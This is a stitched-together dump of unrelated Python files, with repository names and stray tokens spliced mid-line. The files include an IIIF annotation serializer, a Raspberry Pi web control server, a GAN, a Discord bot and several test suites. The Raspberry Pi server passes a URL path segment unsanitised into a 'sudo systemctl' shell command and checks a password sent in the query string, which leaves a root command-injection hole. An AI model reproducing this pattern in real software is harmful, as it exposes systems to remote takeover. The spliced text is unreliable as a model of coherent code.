"""Module for serializing IIIF Annotation""" from django.core.serializers.base import SerializerDoesNotExist from apps.iiif.serializers.base import Serializer as JSONSerializer import config.settings.local as settings class Serializer(JSONSerializer): """ Serialize a :class:`apps.iiif.annotation.models.Annotation` object based on the IIIF Presentation API IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list """ def _init_options(self): super()._init_options() self.owners = self.json_kwargs.pop('owners', 0) def get_dump_object(self, obj): """ Serialize an :class:`apps.iiif.annotation.models.Annotation` based on the IIIF presentation API :param obj: Annotation to be serialized. :type obj: :class:`apps.iiif.annotation.models.Annotation` :return: Serialzed annotation. :rtype: dict """ # TODO: Add more validation checks before trying to serialize. if ((self.version == 'v2') or (self.version is None)): name = 'OCR' if obj.owner_id: name = obj.owner.username if obj.owner.name == '' else obj.owner.name data = { "@context": "http://iiif.io/api/presentation/2/context.json", "@id": str(obj.pk), "@type": "oa:Annotation", "motivation": obj.motivation, "annotatedBy": { "name": name }, "resource": { "@type": obj.resource_type, "format": "text/html", "chars": obj.content, "language": obj.language }, "on": { "full": '{h}/iiif/{v}/{m}/canvas/{c}'.format( h=settings.HOSTNAME, v=self.version, m=obj.canvas.manifest.pid, c=obj.canvas.pid ), "@type": "oa:SpecificResource", "within": { "@id": '{h}/iiif/{v}/{c}/manifest'.format( h=settings.HOSTNAME, v=self.version, c=obj.canvas.manifest.pid ), "@type": "sc:Manifest" }, "selector": { "@type": "oa:FragmentSelector", "value": 'xywh={x},{y},{w},{h}'.format( x=str(obj.x), y=str(obj.y), w=str(obj.w), h=str(obj.h) ) } } } if hasattr(obj, 'style') and obj.style is not None: data['stylesheet'] = self.__serialize_style(obj) if obj.item is not None: data['on']['selector']['item'] = self.__serialize_item(obj) else: data['on']['selector']['item'] = {'@type': 'oa:FragmentSelector'} if hasattr(obj, 'tags') and obj.tags.exists(): data['motivation'] = data['motivation'].split(',') data['resource'] = [data['resource']] for tag in obj.tags.all(): wa_tag = { "@type": "oa:Tag", "chars": tag.name } data['resource'].append(wa_tag) # pylint: disable= no-member return data return None # TODO: write serializer for v3 of the IIIF Presentation API. # elif (self.version == 'v3'): # return None # TODO: is this needed? @classmethod def __serialize_item(cls, obj): return obj.item @classmethod def __serialize_style(cls, obj): """ Private function to serialize the stylesheet data. :param obj: Annotation to be serialized :type obj: :class:`apps.iiif.annotation.models.Annotation` :return: Stylesheet data compliant with the web annotation standard. :rtype: dict """ return { "type": "CssStylesheet", "value": obj.style } class Deserializer: """Deserialize IIIF Annotation :raises SerializerDoesNotExist: Not yet implemented. 
""" def __init__(self, *args, **kwargs): raise SerializerDoesNotExist("annotation is a serialization-only serializer") 0 from typing import Tuple import numpy as np from sklearn.feature_extraction.text import TfidfVectorizer def tfidf_train(txt: np.ndarray, *, max_features=25_000) -> Tuple[TfidfVectorizer, np.ndarray]: vectorizer = TfidfVectorizer(max_features=max_features) txt_vectors = vectorizer.fit_transform(txt) return vectorizer, txt_vectors py/ctrl/webctrl.py #!/usr/bin/python3 import urllib.parse as urlparse import http.server import socketserver import os import subprocess import configparser import json import psutil import datetime from urllib.parse import parse_qs from os import path from gpiozero import CPUTemperature from datetime import datetime as dt config = configparser.ConfigParser() config.read('/home/pi/pideskboard/configs/config.ini') WEBPATH=config['system']['path']+"ctrl/web" os.chdir(WEBPATH) class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): pathSplit = self.path.split("?") pathSection = pathSplit[0].split("/") if self.path == '/': self.path = '/index.html' print(self.path); return http.server.SimpleHTTPRequestHandler.do_GET(self) elif path.exists(WEBPATH+pathSplit[0]) is True: self.path = pathSplit[0] return http.server.SimpleHTTPRequestHandler.do_GET(self) elif pathSection[1] == "stats.json": self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() outputJson={"ramfree":str(self.get_ramFree())+"MB","ramtotal":str(self.get_ramTotal())+"MB","cpuspeed":str(self.get_cpu_speed())+"MHz","cputemp":str(self.get_temperature())+"°C","cpuuse":str(self.get_cpu_use())+"%","load":str(self.get_load()),"ip":str(self.get_ipaddress()),"uptime":str(self.get_uptime())} return self.wfile.write(bytes(json.dumps(outputJson), "utf-8")) elif pathSection[1] == "run": self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() if self.getPass(self.path) == config['ctrl']['pass']: if pathSection[2] == "reboot": self.wfile.write(bytes('{"html":"Rebooting the Raspberry Pi","cmd":null}', "utf-8")) os.system(config['cli']['reboot']) elif pathSection[2] == "poweroff": self.wfile.write(bytes('{"html":"Powering off the Raspberry Pi","cmd":null}', "utf-8")) os.system(config['cli']['poweroff']) elif pathSection[2] == "restart": self.wfile.write(bytes('{"html":"Restarting the UI","cmd":null}', "utf-8")) os.system(config['cli']['restart']) elif pathSection[2] == "start": self.wfile.write(bytes('{"html":"Starting the UI","cmd":null}', "utf-8")) os.system(config['cli']['start']) elif pathSection[2] == "kill": self.wfile.write(bytes('{"html":"Killing the UI","cmd":null}', "utf-8")) os.system(config['cli']['kill']) elif pathSection[2] == "bluetooth": self.wfile.write(bytes('{"html":"Restarting the Bluetooth","cmd":null}', "utf-8")) os.system(config['cli']['bluetooth']) elif pathSection[2] == "service": if pathSection[3] == "start" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Starting the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) os.system("sudo systemctl start " + pathSection[4]) elif pathSection[3] == "stop" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Stoping the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) os.system("sudo systemctl stop " + pathSection[4]) elif pathSection[3] == "restart" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Re-starting the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) 
os.system("sudo systemctl restart " + pathSection[4]) else: self.wfile.write(bytes('{"html":"Unknown service command","cmd":null}', "utf-8")) else: self.wfile.write(bytes('{"html":"Wrong command","cmd":null}', "utf-8")) else: self.wfile.write(bytes('{"html":"Wrong password","cmd":null}', "utf-8")) else: self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(bytes('Document requested is not found.', "utf-8")) return def getPass(self,url): parsed = urlparse.urlparse("http://localhost"+url) return str(parse_qs(parsed.query)['pass']).replace("['","").replace("']","") def get_ramTotal(self): memory = psutil.virtual_memory() return round(memory.total/1024.0/1024.0,1) def get_ramFree(self): memory = psutil.virtual_memory() return round(memory.available/1024.0/1024.0,1) def get_cpu_use(self): return psutil.cpu_percent() def get_temperature(self): try: cpu = CPUTemperature() return cpu.temperature except: return "n/a" def get_uptime(self): try: s = subprocess.check_output(["uptime","-p"]) return s.decode().replace("\n","") except: return "n/a" def get_load(self): try: s = subprocess.check_output(["uptime"]) load_split = s.decode().split("load average:") return load_split[1].replace("\n","") except: return "n/a" def get_ipaddress(self): try: s = subprocess.check_output(["hostname","-I"]) return s.decode().replace("\n","") except: return "0.0.0.0" def get_cpu_speed(self): try: f = os.popen('vcgencmd get_config arm_freq') cpu = f.read() if cpu != "": return cpu.split("=")[1].replace("\n","") else: return "n/a" except: return "n/a" print(dt.now().strftime("%m-%d-%y %H:%M > ") + "piWebCtrl started") handler_object = MyHttpRequestHandler my_server = socketserver.TCPServer(("0.0.0.0", int(config['ctrl']['port'])), handler_object) print(dt.now().strftime("%m-%d-%y %H:%M > ") + "piWebCtrl started Web Server") my_server.serve_forever() castargo/SarcDetectionRusModels import gensim.downloader as api import numpy as np from joblib import Parallel, delayed from pymystem3 import Mystem from sklearn.base import BaseEstimator, ClassifierMixin from pathlib import Path import pickle from tqdm import tqdm def tag(word): RNC2UPOS = { 'A': 'ADJ', 'ADV': 'ADV', 'ADVPRO': 'ADV', 'ANUM': 'ADJ', 'APRO': 'DET', 'COM': 'ADJ', 'CONJ': 'SCONJ', 'INTJ': 'INTJ', 'NONLEX': 'X', 'NUM': 'NUM', 'PART': 'PART', 'PR': 'ADP', 'S': 'NOUN', 'SPRO': 'PRON', 'UNKN': 'X', 'V': 'VERB' } m = Mystem() processed = m.analyze(word)[0] lemma = processed["analysis"][0]["lex"].lower().strip() pos = processed["analysis"][0]["gr"].split(',')[0] pos = pos.split('=')[0].strip() tagged = lemma+'_'+RNC2UPOS[pos] return tagged class GensimWord2VecRUSEmbeddingVectorizer(BaseEstimator, ClassifierMixin): def __init__(self, concat_strings=True, tag_path='./data/Embeddings/word2vec_ruscorpora_tags.pickle'): self.model = api.load("word2vec-ruscorpora-300") self.seq_size = 30 self.concat_strings = concat_strings self.vec_size = 300 self.tag_path = tag_path self._load_tag_tokens() def fit(self, X, y=None): return self def get_params(self, **params): return {'model': self.model, 'seq_size': self.seq_size} def _load_tag_tokens(self): if Path(self.tag_path).is_file(): with open(self.tag_path, 'rb') as f: self.tag_tokens = pickle.load(f) else: self.tag_tokens = {} def _get_token(self, origin_token): if origin_token in self.tag_tokens: return self.tag_tokens[origin_token] try: token = tag(origin_token) self.tag_tokens[origin_token] = token except: self.tag_tokens[origin_token] = "" return self.tag_tokens[origin_token] 
def _get_token_vec(self, origin_token): token = self._get_token(origin_token) if token in self.model: return self.model[token] else: return np.zeros((self.vec_size, )) def _transform_one(self, input_string): tokens = input_string.split() embedd_tokens = [ np.expand_dims(self._get_token_vec(t), 0) for t in tokens[:self.seq_size] ] if len(embedd_tokens) < self.seq_size: embedd_tokens += [np.expand_dims(np.zeros((self.vec_size, )), 0)] * (self.seq_size - len(embedd_tokens)) if self.concat_strings: return np.concatenate(embedd_tokens, 1) else: return np.array([embedd_tokens]) def transform(self, X): vectors = [self._transform_one(s) for s in X] with open(self.tag_path, 'wb') as f: pickle.dump(self.tag_tokens, f) embeddings = np.concatenate(vectors, 0) if self.concat_strings: return embeddings else: return np.squeeze(embeddings, 2) import pickle as pkl import numpy as np with open("all_metrics.pkl", "rb") as f: metrics = pkl.load(f) all_pop = np.array([v[0] for v in metrics]) all_pvi = np.array([v[1] for v in metrics]) all_comp = np.array([v[2] for v in metrics]) pop_mean = np.mean(all_pop) pvi_mean = np.mean(all_pvi) comp_mean = np.mean(all_comp) mean_array = np.array([pop_mean, pvi_mean, comp_mean]) std_array = np.array([np.std(all_pop), np.std(all_pvi), np.std(all_comp)]) with open("new_metrics.pkl", "wb") as fout: pkl.dump((mean_array, std_array), fout) drehak/leapp import pytest from leapp.actors import Actor, get_actors from leapp.topics import Topic from leapp.exceptions import CyclingDependenciesError from leapp.models import Model from leapp.tags import Tag from leapp.workflows.phaseactors import PhaseActors class CycleTag1(Tag): name = 'cycle1' class PhaseActorsModelsTag1(Tag): name = 'phase-actor-models1' class CycleTopic(Topic): name = 'cycle' class CycleModel1(Model): topic = CycleTopic class CycleModel2(Model): topic = CycleTopic class CycleActor1(Actor): name = 'CycleActor1' description = 'Unit Test Actor CycleActor1' consumes = (CycleModel1,) produces = (CycleModel2,) tags = (CycleTag1,) class CycleActor2(Actor): name = 'CycleActor2' description = 'Unit Test Actor CycleActor2' consumes = (CycleModel2,) produces = (CycleModel1,) tags = (CycleTag1, PhaseActorsModelsTag1) class CycleActor3(Actor): name = 'CycleActor3' description = 'Unit Test Actor CycleActor3' consumes = (CycleModel1,) produces = () tags = (CycleTag1, PhaseActorsModelsTag1) def setup_module(module): for actor in get_actors(): for tag in actor.tags: tag.actors = tag.actors + (actor,) def test_actor_phases_detect_cycles(): # Expected a cycle to be detected with pytest.raises(CyclingDependenciesError): PhaseActors(CycleTag1.actors, 'Test') # This should not cause a cycle to be present PhaseActors(PhaseActorsModelsTag1.actors, 'Test') def test_actor_phases_check_models(): phase_actors = PhaseActors(PhaseActorsModelsTag1.actors, 'Test') assert len(phase_actors.initial) == 1 and phase_actors.initial[0] is CycleModel2 assert len(phase_actors.consumes) == 2 assert CycleModel1 in phase_actors.consumes assert CycleModel2 in phase_actors.consumes assert len(phase_actors.produces) == 1 assert CycleModel1 in phase_actors.produces def test_actor_phases_order(): initial_actors = (CycleActor3, CycleActor2) phase_actors = PhaseActors(initial_actors, 'Test') assert len(phase_actors.actors) == 2 assert phase_actors.actors[0] is CycleActor2 assert phase_actors.actors[1] is CycleActor3 1-10 import tensorflow as tf from tensorflow import keras from tensorflow.keras.layers import * def deconv(out_channels, kernel_size, stride=2, 
padding=1, batch_norm=True): """Create a transposed-convolutional layer with optional batch normalization """ # create a sequence of transpose + optional batch norm layers ## We don't need that in_channel in tensorflow layers = [] transpose_conv_layer = Conv2DTranspose(out_channels, kernel_size, strides = stride, padding = 'same', use_bias = False, data_format = "channels_first") # append transpose convolutional layer layers.append(transpose_conv_layer) if batch_norm: # append batchnorm layer layers.append(BatchNormalization()) ## rtype: List[t_conv_layer, batch_norm] or List[t_conv_Layer] return layers class Generator(keras.Model): ## outputsize = stride * (inputsize - 1) + 2 * padding - kernelsize + 2. if padding == 1 than outputsize == inputsize. So we use padding = 'same' in tf def __init__(self, z_size, conv_dim = 32): ## inherit init method from class Model in keras, if you have no idea with what inherit methods from ## parent model, please Google "super python" super(Generator, self).__init__() # complete init function self.conv_dim = conv_dim self.fc = Dense(conv_dim * 4 * 4 * 4, input_shape = (z_size,)) t_conv1 = deconv(conv_dim * 2, 4) self.t_conv1 = t_conv1[0] if len(t_conv1) == 2: self.bn_1 = t_conv1[1] t_conv2 = deconv(conv_dim, 4) self.t_conv2 = t_conv2[0] if len(t_conv2) == 2: self.bn_2 = t_conv2[1] # desired depth for RGB image is 3 ## output here is in CHW format self.t_conv3 = deconv(3, 4, batch_norm = False)[0] def call(self, xx, training = None): # call in tf is an equivalent with forward in torch out = self.fc(xx) out = tf.reshape(out, [-1, self.conv_dim * 4, 4, 4]) out = self.t_conv1(out) if self.bn_1: out = self.bn_1(out, training = training) out = tf.nn.relu(out) out = self.t_conv2(out) if self.bn_2: out = self.bn_2(out, training = training) out = tf.nn.relu(out) out = self.t_conv3(out) out = tf.tanh(out) ## to HWC format ## Time complexity of numpy.transpose is O(1), according to: https://www.thetopsites.net/article/58279082.shtml # out = tf.transpose(out, perm = [0, 3, 1, 2]) return out def conv(out_channels, kernel_size, stride=2, padding=1, batch_norm=True): """Creates a convolutional layer, with optional batch normalization. """ layers = [] conv_layer = Conv2D(out_channels, kernel_size, strides = stride, padding = 'same', use_bias = False, data_format = "channels_first") # bias is set to False, so the layers are not offset by any amount # append conv layer layers.append(conv_layer) if batch_norm: # append batchnorm layer layers.append(BatchNormalization()) ## rtype: List[conv_layer, batch_norm] or List[conv_layer] return layers class Discriminator(keras.Model): ## outputsize = (inputsize - kernelsize + 2 * padding)/stride + 1, so when stride = 2, kernel_size = 4. if padding == 1 than outputsize == inputsize. 
So we use padding = 'same' in tf ## if you want to custom padding size, please read helper here https://stackoverflow.com/questions/37659538/custom-padding-for-convolutions-in-tensorflow ## tf.pad is still available in tf 2.0+ ## you can also create a sequence and use sequence.add(layer) to add layers to model, see the tutorial here: ## https://www.tensorflow.org/tutorials/generative/dcgan def __init__(self, conv_dim=32): super(Discriminator, self).__init__() self.conv_dim = conv_dim self.conv1 = conv(conv_dim, 4, batch_norm= False)[0] conv2 = conv(conv_dim * 2, 4) self.conv2 = conv2[0] if len(conv2) == 2: self.bn_1 = conv2[1] conv3 = conv(conv_dim * 4, 4) self.conv3 = conv3[0] if len(conv3) == 2: self.bn_2 = conv3[1] self.flatten = Flatten() self.fc = Dense(1) def call(self, xx, training = None): out = self.conv1(xx) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.conv2(out) if self.bn_1: out = self.bn_1(out, training = training) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.conv3(out) if self.bn_2: out = self.bn_2(out, training = training) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.flatten(out) out = self.fc(out) return out def real_loss(D_out, smooth=False): batch_size = D_out.shape[0] # label smoothing if smooth: # smooth, real labels = 0.9 labels = tf.ones(batch_size) * 0.9 else: labels = tf.ones(batch_size) # real labels = 1 ## Reference 1: https://stackoverflow.com/questions/55683729/bcewithlogitsloss-in-keras ## Reference 2: https://www.tensorflow.org/tutorials/generative/dcgan ## So we use BinaryCrossentropy here in tf to replace BCEWithLogitsLoss() in torch criterion = tf.keras.losses.BinaryCrossentropy(from_logits=True) loss = criterion(labels, D_out) return loss def fake_loss(D_out): batch_size = D_out.shape[0] labels = tf.zeros(batch_size) # fake labels = 0 criterion = tf.keras.losses.BinaryCrossentropy(from_logits=True) # calculate loss loss = criterion(labels, D_out) return loss ## I put in the loss calculation here instead of main function def dis_loss(generator, discriminator, input_noise, real_image, is_training): fake_image = generator(input_noise, is_training) d_real_logits = discriminator(real_image, is_training) d_fake_logits = discriminator(fake_image, is_training) d_loss_real = real_loss(d_real_logits) d_loss_fake = fake_loss(d_fake_logits) loss = d_loss_real + d_loss_fake return loss def gen_loss(generator, discriminator, input_noise, is_training): fake_image = generator(input_noise, is_training) fake_loss = discriminator(fake_image, is_training) loss = real_loss(fake_loss) return lossfightlol/Cloud-Nine import os import io import ksoftapi from googletrans import Translator, LANGUAGES from textwrap import TextWrapper import random import discord from discord.ext import commands class Utility(commands.Cog): def __init__(self, bot): self.bot = bot self.trans = Translator() @commands.command() async def listusers(self, ctx): """Displays the list of connected users""" if not ctx.author.voice: return await ctx.send("You are not connected to a voice channel :mute:") members = ctx.author.voice.channel.members memnames = [] for member in members: memnames.append(member.name) embed = discord.Embed(title = f"Members in *{ctx.author.voice.channel.name}*", color = ctx.author.color) embed.add_field(name= "List of users", value= f"**\n" + "\n".join(memnames) + "**") embed.set_footer(icon_url=ctx.author.avatar_url, text=f"Requested by {ctx.author.name}") await ctx.send(embed = embed) @commands.command(no_pm=True) async def whosplaying(self, ctx, *, game): 
"""Shows who's playing a specific game""" if len(game) <= 1: await ctx.send("```The game should be at least 2 characters long...```", delete_after=5.0) return guild = ctx.message.guild members = guild.members playing_game = "" count_playing = 0 for member in members: if not member: continue if not member.activity or not member.activity.name: continue if member.bot: continue if game.lower() in member.activity.name.lower(): count_playing += 1 if count_playing <= 15: emote = random.choice([":trident:", ":high_brightness:", ":low_brightness:", ":beginner:", ":diamond_shape_with_a_dot_inside:"]) playing_game += f"{emote} {member.name} ({member.activity.name})\n" if playing_game == "": await ctx.send("Search results:\nNo users are currently playing that game.") else: msg = playing_game if count_playing > 15: showing = "(Showing 15/{})".format(count_playing) else: showing = "({})".format(count_playing) em = discord.Embed(description=msg, colour=discord.Colour(value=0x36393e)) em.set_author(name=f"""Who's playing "{game}"? {showing}""") await ctx.send(embed=em) def setup(bot): bot.add_cog(Utility(bot))""" inventory integration tests """ import json import os import pytest from ... import defaults from .._common import get_executable_path from .._common import fixture_path_from_request from .._common import update_fixtures CLI = ( f"{get_executable_path('python')}" " -m ansible_navigator inventory" f" -i {os.path.join(defaults.FIXTURES_DIR,'inventory')}" ) testdata = [ (0, CLI, "ansible-navigator inventory command top window"), (1, ":0", "Browse hosts/ungrouped window"), (2, ":0", "Group list window"), (3, ":0", "group01 hosts detail window"), (4, ":0", "host0101 detail window"), (5, ":back", "Previous window (group01 hosts detail window)"), (6, ":back", "Previous window (Group list window)"), (7, ":1", "group02 hosts detail window"), (8, ":0", "host0201 detail window"), (9, ":back", "Previous window (group02 hosts detail window)"), (10, ":back", "Previous window (Group list window)"), (11, ":2", "group03 hosts detail window"), (12, ":0", "host0301 detail window"), (13, ":back", "Previous window (group03 hosts detail window)"), (14, ":back", "Previous window (Group list window)"), (15, ":back", "Previous window (Browse hosts/ungrouped window)"), (16, ":back", "Previous window (top window)"), (17, ":1", "Inventory hostname window"), (18, ":0", "host0101 detail window"), (19, ":back", "Previous window after host0101 (Inventory hostname window)"), (20, ":1", "host0201 detail window"), (21, ":back", "Previous window after host0201 (Inventory hostname window)"), (22, ":2", "host0301 detail window"), ] def test_testdata_indicies(): """sanity check on the data because I forgot how to count""" expected = list(range(0, len(testdata))) actual = [x[0] for x in testdata] assert expected == actual @pytest.mark.parametrize("index, user_input, comment", testdata) def test_inventory_interactive_inventory_list(request, tmux_session, index, user_input, comment): # pylint:disable=unused-argument """test interactive inventory uncomment the update_fixtures line to update the fixtures """ received_output = tmux_session.interaction(user_input) # update_fixtures(request, index, received_output, comment) # FIXME: keep commented out dir_path, file_name = fixture_path_from_request(request, index) with open(f"{dir_path}/{file_name}") as infile: expected_output = json.load(infile)["output"] assert expected_output == received_output fera = {'animal':'pitbull', 'dono':'Flavio José'} bocudo = {'animal':'papagaio','dono':'Priscila 
Alcantara'} mimi = {'animal': 'gata','dono':'Fabrine Cardoso'} sara = {'animal': 'pastor alemao','dono' : ''} pets = [fera,bocudo,mimi,sara] for pet in pets: print('\nPets: ' , pet) # coding:utf-8 # --author-- binglu.wang from __future__ import print_function import os import logging import maya.cmds as cmds import zfused_api import zfused_maya.core.record as record import zfused_maya.core.filefunc as filefunc import zfused_maya.node.core.alembiccache as alembiccache import zfused_maya.node.core.texture as texture import zfused_maya.node.core.yeti as yeti import zfused_maya.node.core.material as material import zfused_maya.node.core.fixmeshname as fixmeshname import zfused_maya.node.core.renderinggroup as renderinggroup import zfused_maya.node.core.referencefile as referencefile __all__ = ["publish_file"] logger = logging.getLogger(__name__) # test def publish_file(): """ 上传yeti文件 """ _attr_code = "file" _file_suffix = "mb" _file_format = "mayaBinary" _current_file = cmds.file(q = True, sn = True) # get current task id _task_id = record.current_task_id() if not _task_id: logger.error("no active task") return False # get backup file path _task_handle = zfused_api.task.Task(_task_id) _object_handle = zfused_api.objects.Objects(_task_handle.data["Object"], _task_handle.data["LinkId"]) _production_path = _task_handle.production_path() _file_code = _object_handle.file_code() _file_index = _task_handle.last_version_index() + 1 _production_file = "%s/%s/%s.%04d.%s"%(_production_path, _attr_code, _file_code, _file_index, _file_suffix) _cover_file = "%s/%s/%s.%s"%(_production_path, _attr_code, _file_code, _file_suffix) # get publish file path _publish_path = _task_handle.publish_path() _publish_file = "%s/%s/%s.%04d.%s"%(_publish_path, _attr_code, _file_code, _file_index, _file_suffix) _publish_file_dir = os.path.dirname(_publish_file) if not os.path.isdir(_publish_file_dir): os.makedirs(_publish_file_dir) try: _current_file = cmds.file(q = 1,sn = 1) # save publish file _sel = [i for i in cmds.ls("fx") if cmds.objExists("%s.name"%i) and cmds.getAttr("%s.name"%i) == "fx"] _yeti_all_set = cmds.ls("yeti_all_sets",type = "objectSet") if _yeti_all_set: _sel.append(_yeti_all_set[0]) cmds.select(_sel,r = 1,ne = 1) cmds.file(rename = _publish_file) cmds.file(f = 1,options = "v=0;",typ = "mayaBinary" ,pr= 1, es=1) # open publish file cmds.file(new = 1,f= 1) cmds.file(_publish_file,f =1,o = 1,typ = "mayaBinary",ignoreVersion = 1,options = "v=0;") # publish texture # 修改文件中贴图路径 _texture_files = texture.files() if _texture_files: # 获取路径 _path_set = texture.paths(_texture_files)[0] _intersection_path = max(_path_set) texture.publish_file(_texture_files, _intersection_path, _production_path + "/texture") # change maya texture node path _file_nodes = texture.nodes() if _file_nodes: texture.change_node_path(_file_nodes, _intersection_path, _production_path + "/texture") # 修改文件中yeti节点里的贴图路径 _yeti_texture_dict = yeti._get_yeti_attr("texture","file_name") if _yeti_texture_dict: _path_set = yeti.paths([i.replace("\\","/") for i in _yeti_texture_dict.values()])[0] _intersection_path = max(_path_set) yeti.publish_file(_yeti_texture_dict.values(), _intersection_path, _production_path + "/texture") yeti.change_node_path(_yeti_texture_dict,_intersection_path, _production_path + "/texture") # delete unused material material.delete_unused() # recore material material.record() # save publish file cmds.file(save = True, type = _file_format, f = True) # publish file _result = filefunc.publish_file(_publish_file, 
_production_file) _result = filefunc.publish_file(_publish_file, _cover_file) # link files zfused_api.files.new_file("task", _task_id, _production_file, _file_index) zfused_api.files.new_file("task", _task_id, _cover_file, _file_index) except Exception as e: logger.error(e) return False # open orignal file # if _current_file: # cmds.file(_current_file, o = True, f = True, pmt = True) return True if __name__ == '__main__': publish_file()# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from datetime import date, datetime import pytest from indico.core.db.sqlalchemy.protection import ProtectionMode from indico.modules.rb.models.reservations import Reservation from indico.modules.rb.models.room_attributes import RoomAttribute from indico.modules.rb.models.rooms import RoomAttributeAssociation from indico.web.flask.util import url_for from indico_burotel.tasks import auto_cancel_bookings pytest_plugins = 'indico.modules.rb.testing.fixtures' pytestmark = [pytest.mark.usefixtures('smtp')] class NoCSRFTestClient: def __init__(self, client): self.client = client def __getattr__(self, attr): def _verb_wrapper(*args, **kwargs): headers = kwargs.get('headers', {}) headers['X-CSRF-Token'] = 'dummy' kwargs['headers'] = headers return getattr(self.client, attr)(*args, **kwargs) if attr in {'post', 'patch', 'delete'}: return _verb_wrapper else: return getattr(self.client, attr) @pytest.fixture(autouse=True) def room_attributes(db): attr_approval = RoomAttribute(name='confirmation-by-secretariat', title="Secretariat must confirm") attr_lock = RoomAttribute(name='electronic-lock', title="Electronic Lock") db.session.add(attr_approval) db.session.add(attr_lock) db.session.flush() return (attr_lock, attr_approval) @pytest.fixture(autouse=True) def back_to_the_past(freeze_time): freeze_time(datetime(2020, 1, 1)) @pytest.fixture def no_csrf_client(test_client, monkeypatch): monkeypatch.setattr('indico.web.flask.session.IndicoSession.csrf_token', property(lambda self: 'dummy')) return NoCSRFTestClient(test_client) def test_update_called_on_create(db, dummy_user, mocker, create_room, no_csrf_client, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room() with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) assert no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-01", 'end_dt': "2020-02-02", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }).status_code == 200 assert not adams_request.called # ADaMS is only contacted for rooms with 'electronic-lock' set to 'yes' room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) db.session.flush() assert no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-03", 'end_dt': "2020-02-04", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }).status_code == 200 adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 3), date(2020, 2, 4)) def test_update_called_on_accept(create_room, mocker, no_csrf_client, dummy_user, room_attributes): attr_lock = room_attributes[0] adams_request = 
mocker.patch('indico_burotel.tasks._adams_request') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-01", 'end_dt': "2020-02-02", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 prebooking = Reservation.get(response.json['booking']['id']) assert not adams_request.called no_csrf_client.post(url_for('rb.booking_state_actions', booking_id=prebooking.id, action='approve')) # after the pre-booking is accepted, _adams_request should be called adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)) def test_update_called_on_modify(create_room, mocker, no_csrf_client, dummy_user, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': '2020-02-01', 'end_dt': '2020-02-02', 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }) assert response.status_code == 200 adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)) adams_request.reset_mock() response = no_csrf_client.patch(url_for('rb.update_booking', booking_id=response.json['booking']['id']), data={ 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'start_dt': '2020-02-02', 'end_dt': '2020-02-03' }) assert response.status_code == 200 assert adams_request.call_args_list == [ (('cancel', dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)),), (('create', dummy_user, room, date(2020, 2, 2), date(2020, 2, 3)),) ] def test_update_called_on_reject(dummy_user, create_room, mocker, no_csrf_client, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room(attributes=[RoomAttributeAssociation(attribute=attr_lock, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-05", 'end_dt': "2020-02-06", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, }) assert response.status_code == 200 booking = Reservation.get(response.json['booking']['id']) adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 5), date(2020, 2, 6)) no_csrf_client.post(url_for('rb.booking_state_actions', booking_id=booking.id, action='cancel')) # after the pre-booking is accepted, _adams_request should be called adams_request.assert_called_with('cancel', dummy_user, room, date(2020, 2, 5), date(2020, 2, 6)) assert adams_request.call_count == 2 
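# The auto-cancellation tests below check that a pre-booking in a room carrying the
# 'confirmation-by-secretariat' attribute gets a warning two working days after its start date
# and is cancelled on the following working day, that weekend days are not counted toward that
# deadline, and that rooms without the attribute are never auto-cancelled.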
